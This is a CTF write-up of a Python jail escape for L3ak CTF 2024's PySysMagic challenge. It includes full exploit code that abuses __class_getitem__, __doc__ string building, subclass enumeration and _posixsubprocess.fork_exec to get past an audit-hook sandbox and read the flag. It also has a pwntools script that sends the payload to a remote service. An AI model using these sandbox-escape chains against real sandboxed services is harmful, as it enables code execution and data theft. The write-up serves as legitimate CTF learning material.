Yet Another PyJail - PySysMagic - L3ak CTF 2024
I partecipated to the first edition of L3ak CTF
with FoocHackz
. I solved this challenge, it wasn’t hard but writing a working exploit took me at least one/two hours.
As the title of the challenge suggests, it’s a pyjail. To be more precise, two challenges from two different CTFs were merged together
obligatory pyjail
fromLIT CTF 2023
fromTCP1P CTF 2023
So, with that in mind, let’s take a look at the source code
We’re given a bunch of files but these are the most important ones
a C program which uses Audit Hooks to implement a whitelist sandbox. The only audit events we’re allowed to use arecompile
the actual challenge script
# python3.10 build
# obligatory pyjail + PyMagic = ?
import os, sys
from distutils.core import Extension, setup
... # Useless stuff
code = input(">>> ")
import sys
import audit_sandbox
del audit_sandbox
del sys.modules["audit_sandbox"]
del sys
import re
class ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz:
... # ill be nice :)
eval = eval
if not re.findall("[()'\"0123456789 ]", code):
for k in (b := __builtins__.__dict__).keys():
b[k] = None
eval(code, {"__builtins__": {}, "_": ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz})
A lot of things immediately catch the eye
- All builtin functions are apparently deleted except
but can be accessed from the__main__
module ()
and numbers are not allowed'
are not allowed- A cool gadget called
is given to us
If there had been exec
instead of eval
, we could have used decorators!
A bit of Py-Magic
In this case, we can use a cool trick from the PyMagic
challenge mentioned above
def call_function(f, arg):
return (f"[[None for _.__class_getitem__ in [{f}]],"
Thanks to __class_getitem__
we’re able to call any function without using brackets
None for _.__class_getitem__ in [int] # Equivalent of _.__class_getitem__ = int
_['12'] # Calling _.__class_getitem__ -> int
][True] # Get the return value
But using this method, we have limitations: we are forced to pass only one argument to a function
Obligatory pyjail
Ok now we need to bypass the audit sandbox. The file called audit_sandbox.c
was actually stolen taken from LIT CTF 2023
Let’s just take a look the solve for obligatory pyjail
(Credits to flocto)
[lm:=().__class__.__base__.__subclasses__()[104].load_module,p:=__import__("os").pipe,_ps:=lm("_posixsubprocess"),_ps.fork_exec([b"/bin/cat", b"flag.txt"], [b"/bin/cat"], True, (), None, None, -1, -1, -1, -1, -1, -1, *(p()), False, False, None, None, None, -1, None)]
So using _posixsubprocess.fork_exec
we bypass that sandobx. Cool, but there’s a catch: fork_exec
requires exactly 21 arguments. As I said before, we’re allowed to pass exactly 1 argument using _.__class_getitem__
And now what?
Building payloads from docs
I specified earlier that eval
is not completely deleted. In fact, we can access it from the __main__
module. Since we can’t import anything, we can reach the sys
module from some objects found in ().__class__.__base__.__subclasses()
andd then access to eval
using sys.modules['__main__']
But how can eval
be useful to us?
Our goal is to call fork_exec
passing to it 21 arguments. We can build payloads from scratch using docs (eg. [].__doc__
). If some characters are not in the docs, we can get them from _.__qualname__
So, our main idea would be:
- Build a payload from docs which would call
- Reach
- Call it and pass the payload as the first argument
- Profit
I copy pasted the solve for PyMagic
, you can find it here (Credits to SuperStormer)
from pwn import *
def gen_int(i):
if i == 0:
return "False"
return "--".join(["True"] * i)
def call_function(f, arg):
return (f"[[None for _.__class_getitem__ in [{f}]],"
type_s = "_.__class__"
object_s = "_.__base__"
subclasses = call_function(type_s + ".__subclasses__", object_s) # _.__class__.__subclasses__(_.__base__)
wrap_close = f"{subclasses}[{gen_int(137)}]" # os._wrap_close
os_module = f"{wrap_close}.__init__.__globals__"
class ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz:pass
def build_string(string):
src = [].__doc__.__doc__ + {}.__doc__
final = ""
for x in string:
fromdoc = (a:=src.find(x)) != -1
if fromdoc:
final += f"[[].__doc__.__doc__+{{}}.__doc__][False][{gen_int(a)}]+"
else: final += f"_.__qualname__[{gen_int(ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz.__qualname__.find(x))}]+" if ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz.__qualname__.find(x) != -1 else f"{call_function('_.__class__.__subclasses__', '_.__base__')}[{gen_int(14)}].__doc__[True]+"
return final[:-1]
sys_s = f"[*{os_module}][{gen_int(9)}]"
sys_modules = f"{os_module}[{sys_s}].modules"
main_module_s = f"[*{sys_modules}][{gen_int(22)}]"
eval_func = f"{sys_modules}[{main_module_s}].eval"
to_eval = build_string(f"[(os_module:=().__class__.__base__.__subclasses__()[{gen_int(137)}].__init__.__globals__).__class__,(sys:=os_module['sys']).__class__,sys.modules['_posixsubprocess'].fork_exec([f'.{{True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True:c}}readflag'.encode()],[f'.{{True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True--True:c}}readflag'.encode()],True,(),None,None,-True,-True,-True,-True,-True,-True,*(os_module['pipe']()),False,False,None,None,None,-True,None)]")
system_sh = call_function(eval_func, to_eval).replace(' ', '\t')
r = remote("", 6669)
Let’s break it down
Since numbers cannot be used, they can be generated from booleans (eg.3
becomesTrue -- True -- True
). I used--
instead of+
because I couldn’t find+
inside the docsbuild_string
are not allowed so it’s possible to build the payload from docs and from_.__qualname__
generate the payload to call a specified function with an argumentsubclasses
is the equivalent of_.__class__.__subclasses__(_.__base__)
, which is the equivalent of_.__class__.__base__.__subclasses__()
- Access
(position 137) to recover theos
module objects - Do the same thing for the
module and then recover__main__.eval
- Build the payload which will be passed to
- Finally, pass that payload to
and proceed to send everything to the remote server
This is not the intended solution. The author forgot to remove eval
from the main module. I think the intended one is a lot smaller than mine.
What happens if all modules from sys.modules
are removed? Is it still solvable?
At the end, it was a fun challenge to solve ❤️
Thanks to the authors for the challenge and for the CTF in general. It’s always nice to see pyjails in CTFs!
You can find the source of this challenge here
P.S: Do you need a cheatsheet with many tricks to solve pyjails? If so, click here!